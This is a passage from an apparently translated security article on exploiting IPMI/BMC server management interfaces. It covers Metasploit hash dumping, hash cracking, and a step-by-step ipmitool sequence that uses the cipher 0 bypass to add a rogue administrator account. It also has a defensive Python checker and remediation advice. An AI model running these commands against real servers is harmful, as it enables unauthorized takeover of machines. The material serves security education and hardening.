The researchers studied it thoroughly, focusing on the authentication and encryption mechanisms. The arbitrary code execution vulnerability in the UPnP service of Supermicro firmware (Supermicro IPMI UPnP Vulnerability) is CVE-2012-5958 (a buffer overflow in libupnp). The remaining vulnerabilities we touched on were found by analyzing the Supermicro firmware for X9 motherboards, with the emphasis on the code responsible for the web interface.

HANDS-ON LAB

Let's look at the standard scheme for exploiting IPMI vulnerabilities.
Using the ipmi_version module from the well-known Metasploit framework, you can scan the network perimeter. If you are already in the internal segment and there is no way to install or use Metasploit, the simple ipmiping or rmcpping utilities will do.
Once you have discovered open IPMI interfaces, first check them for the “Authentication Bypass via Cipher 0” vulnerability (see above). If it is present, you can do without dumping user hashes and simply reset the administrator’s password or add your own account. Important: to exploit this vulnerability you must know the login of an existing account, and in our case that account must have administrative privileges. First, let's consider the case of a user hash dump followed by brute force.

Using the Metasploit module ipmi_dumphashes we can collect user hashes. Important: without knowing a user’s login, it is impossible to obtain that user's hash. In the ipmi_dumphashes options you can specify the path to a file with logins, for example if administrators have created accounts for themselves. The default file contains the default logins of all vendors. Cracking these hashes is supported by both oclHashcat and John the Ripper with the jumbo patches (community edition). John should be taken from GitHub, since the official website carries an outdated version without support for the format we need. The latest version of oclHashcat, currently 1.30, supports it out of the box.

If you have a hash from an HP iLO4 in your hands, you are lucky. At the factory, the default password of the Administrator account is set to eight characters, uppercase letters plus digits. With my modest resources, searching that space takes about half an hour.

If the cipher 0 vulnerability is present, you can do without brute-forcing hashes and simply reset a password. For this we need the ipmitool utility. Building it for GNU/Linux raises no questions, but under Windows you will have to dance with a tambourine in Cygwin. The sequence of actions for adding an administrator is as follows:

1. Look at which users are present and pick the next free ID (it replaces <ID> in the commands below).

ipmitool -I lanplus -C 0 -H 1.1.1.1 -U Administrator -P anypasswordhere user list

2. Set our user’s login.

ipmitool -I lanplus -C 0 -H 1.1.1.1 -U Administrator -P anypasswordhere user set name <ID> hacker

3. Set a password for it.

ipmitool -I lanplus -C 0 -H 1.1.1.1 -U Administrator -P anypasswordhere user set password <ID> hackerpass

4. Make it an administrator (privilege level 4).

ipmitool -I lanplus -C 0 -H 1.1.1.1 -U Administrator -P anypasswordhere user priv <ID> 4

5. Enable the newly created account.

ipmitool -I lanplus -C 0 -H 1.1.1.1 -U Administrator -P anypasswordhere user enable <ID>
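As a defender-side counterpart to the cipher 0 check and the null/anonymous user described earlier, here is an added example (not code from the original article or from any tool it names) that parses constructed ipmitool lan print and user list output, reports whether cipher suite 0 is usable and whether a nameless account is enabled, and emits the ipmitool commands that close both findings.

```python
import re
# Constructed sample of "ipmitool lan print 1" output (not from a real BMC).
LAN_PRINT = """\
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
                        :     X=Cipher Suite Unused
"""
# Constructed sample of "ipmitool user list 1" output; user 3 is nameless but enabled.
USER_LIST = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      NO ACCESS
2   ADMIN            true    true       true       ADMINISTRATOR
3                    true    true       true       ADMINISTRATOR
"""
USER_RE = re.compile(r"^(\d+)\s+(\S*)\s+(true|false)\s+(true|false)\s+(true|false)\s+(.+?)\s*$")

def cipher0_status(lan_print):
    """Return (enabled, fixed_privs). Slots of 'Cipher Suite Priv Max' follow the order
    of the 'RMCP+ Cipher Suites' list (LAN parameters 23/24), so suite 0 is off only
    when its own slot is 'X'."""
    suites, privs = [], ""
    for line in lan_print.splitlines():
        key, _, val = line.partition(":")
        if key.strip() == "RMCP+ Cipher Suites":
            suites = [int(x) for x in val.split(",") if x.strip()]
        elif key.strip() == "Cipher Suite Priv Max":
            privs = val.strip()
    if 0 not in suites or suites.index(0) >= len(privs) or privs[suites.index(0)] == "X":
        return False, privs
    i = suites.index(0)
    return True, privs[:i] + "X" + privs[i + 1:]

def null_users(user_list):
    """(id, priv) of empty-name users that can still send IPMI messages or hold a privilege."""
    hits = []
    for line in user_list.splitlines():
        m = USER_RE.match(line)
        if m and m.group(2) == "" and (m.group(5) == "true" or m.group(6) != "NO ACCESS"):
            hits.append((int(m.group(1)), m.group(6)))
    return hits

def remediation(lan_print, user_list, channel=1):
    """ipmitool commands that close both findings on the given LAN channel."""
    cmds = []
    enabled, fixed = cipher0_status(lan_print)
    if enabled:
        cmds.append(f"ipmitool lan set {channel} cipher_privs {fixed}")
    cmds += [f"ipmitool user disable {uid}" for uid, _ in null_users(user_list)]
    return cmds
```

Feed it the real output of the two ipmitool commands taken from your own BMCs; the returned commands are the standard lan set cipher_privs and user disable remediations.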

After the hashes are cracked, passwords are reset, or a new administrator is added, you can log in through the web interface, via SSH to SMASH, or connect to the remote console, a la KVM.
The KVM function is of particular value, since it gives access directly to the console itself and thereby lets you reach the BIOS, install an operating system, and the like. Each vendor implements the KVM function in its own way. For example, HP
iLO4 uses TCP ports 17988 and 17990 for this, Dell iDRAC7 uses TCP port 5900, and Cisco CIMC uses TCP port 2068.

It is worth mentioning HP BladeSystem Onboard Administrator. HP BladeSystem is a chassis into which blade servers are inserted, and the chassis allows the blade servers to be managed centrally using IPMI. In this case, authorization on the “slave” IPMI occurs via an SSO mechanism, so all you need is to obtain the hash of a user with administrative privileges and use the web interface to connect to the server you are interested in.

Another interesting feature found in HP iLO4 is the ability to connect to the server via KVM directly from SMASH (read: SSH) using the TEXTCONS command. This is quite useful when ports 80, 443 and 17990 are closed. You need administrator rights for this, but who cares?
Becoming an administrator is not that difficult. Especially for you, reader, I have prepared the ipmicd program in C for Windows/Linux. It scans a range of addresses for the presence of IPMI/BMC and dumps hashes (analogous to ipmi_dumphashes from Metasploit). The program was created for cases when using Metasploit is not the best idea, for example when the IPMI/BMC interfaces are somewhere far away that Metasploit cannot be forwarded to.

The utility is available on GitHub. Very easy to use:

1. The -p parameter is used when a specific range needs to be scanned.
2. The -d parameter tells the program to obtain the hashed passwords.
3. The -v N parameter sets the logging verbosity, 0..5. With N = 1, the program prints fingerprints.

By combining the parameters you can influence the behavior of the program. For example, when -d and -p are used together, the program tries to obtain hashes only from those systems that respond to IPMI pings. Using only -d tries to get hashes from every address, which is usually incredibly slow. If something is in doubt, use -v 5 and the program will display the received messages in a convenient format. To compile under Linux you only need GCC: gcc ipmicd.c -static -o ipmicd. For use on Windows, compile with MinGW: gcc ipmicd.c -mno-ms-bitfields -lws2_32 -DMINGW.

CONCLUSION

A few words on the bigger picture: the study of the capabilities and implementations of the different IPMI/BMC vendors is only beginning. This includes not only the web interfaces or SMASH, but also the operating system drivers that let the installed system interact with the IPMI/BMC remote management technology, the internal services that implement information exchange inside the IPMI/BMC, and even the hardware implementation of the BMC itself and how exactly it controls the main server. I recommend that administrators check all their systems for public vulnerabilities and, where possible, eliminate them. The most important recommendation I would give the reader is to pay maximum attention to the settings of the equipment you control.